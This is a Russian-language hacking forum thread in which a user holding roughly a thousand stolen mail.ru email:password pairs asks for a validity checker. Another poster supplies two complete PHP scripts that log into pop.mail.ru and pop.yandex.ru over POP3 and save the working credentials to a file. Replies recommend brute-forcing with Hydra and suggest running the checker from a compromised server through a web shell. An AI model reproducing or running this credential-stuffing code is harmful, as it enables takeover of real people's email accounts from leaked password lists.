Собсно такая проблемка, имеется база e-mail адресов с паролями вида: логин@mail.ru:пароль (все на mail.ru) база где то на 1000-1300 юзеров и вот нужен чекер для проверки на их валидность. Пробовал искать в гугле и здесь и кроме паршивого Mail Checker (www.rekenwonder.com/mailchk.htm) ничего не нашел. Хотелось бы скриптом ну или на крайняк прогой.
давно писал для яндекса, но идля mail.ru наверное подойдет: PHP: <?php error_reporting(E_ALL); set_time_limit(0); $fr=fopen("resu","r"); $fw=fopen("resu1","w"); echo "<pre>"; while (!feof ($fr)) { $buffer = fgets($fr,255); $lp=explode(':',$buffer,2); $log=explode('@',$lp[0],2); if (($log[1]=='mail.ru') and (isset($lp[1]))){ $ock=fsockopen("pop.mail.ru",110); $html=fgets($ock); $usr="user ".$log[0]."\r\n"; fputs($ock,$usr); $html=fgets($ock); $pwr="pass ".$lp[1]."\r\n"; fputs($ock,$pwr); echo $buffer; $html=fgets($ock); echo $html."\r\n"; if (preg_match("/OK/",$html)) { fputs($fw,$buffer); fclose($ock);} else {fclose($ock);} } } echo "OK!"; echo "</pre>"; fclose($fr); fclose($fw); ?> Вобщем скрипт из списка мыл с паролями формата [email protected]:qwerty [email protected]:trewq [email protected]:12345 .... который хранится в папке со скриптом и называется resu находит только mail.ru мыла и чекает их на валидность пароля, а валидные мыла записывает в файл resu1 ЗЫ можно и получше сделать, но я переделывать ничего не стал
ну ты скажи точно что нужно, могу сам переписать, например несложно сделать отсюда чеккер на несколько серверов, например на mail.ru и yandex.ru, тут уж от нужд и от фантазии зависит вот например для мэйл и яндекса: PHP: <?php error_reporting(E_ALL); set_time_limit(0); $fr=fopen("resu","r"); $fw=fopen("resu1","w"); echo "<pre>"; while (!feof ($fr)) { $buffer = fgets($fr,255); $lp=explode(':',$buffer,2); $log=explode('@',$lp[0],2); if (($log[1]=='mail.ru') or ($log[1]=='yandex.ru') and (isset($lp[1]))){ $serv='pop.'.$log[1]; $ock=fsockopen($serv,110); $html=fgets($ock); $usr="user ".$log[0]."\r\n"; fputs($ock,$usr); $html=fgets($ock); $pwr="pass ".$lp[1]."\r\n"; fputs($ock,$pwr); echo $buffer; $html=fgets($ock); echo $html."\r\n"; if (preg_match("/OK/",$html)) { fputs($fw,$buffer); fclose($ock);} else {fclose($ock);} } } echo "OK!"; echo "</pre>"; fclose($fr); fclose($fw); ?>
Как ты мог заметить, что в моем скрипте не только на яндекс идет упор, а насчет веб-авторизации, то это гораздо больше трафика кушает, мой скрипт для того, чтоб чекать разные "почты", просмотри еще раз сам скрипт
Я тебе просто сказал... без приколов. Я все посмотрел. Вобще, как по мне, самый простой вариант попы брутить гидрой: и скорость достаточная и с почтовика на почтовик легко перестроиться. Трафа больше,но и возможностей больше...
Да какой разговор, гидра рулит, 100%, только это чеккер, а не брут, ну насчет скорости я вобще говорить небуду (а то опять начнется спор насчет многопоточности) япривел пример простейшего чеккера мыл, если это будет кому то интересно, то я интерфейс какой нить намучу, данный скрипт удобен тем, что его можно запустить на "взломанном" сервере, имея веб-шелл с небольшими правами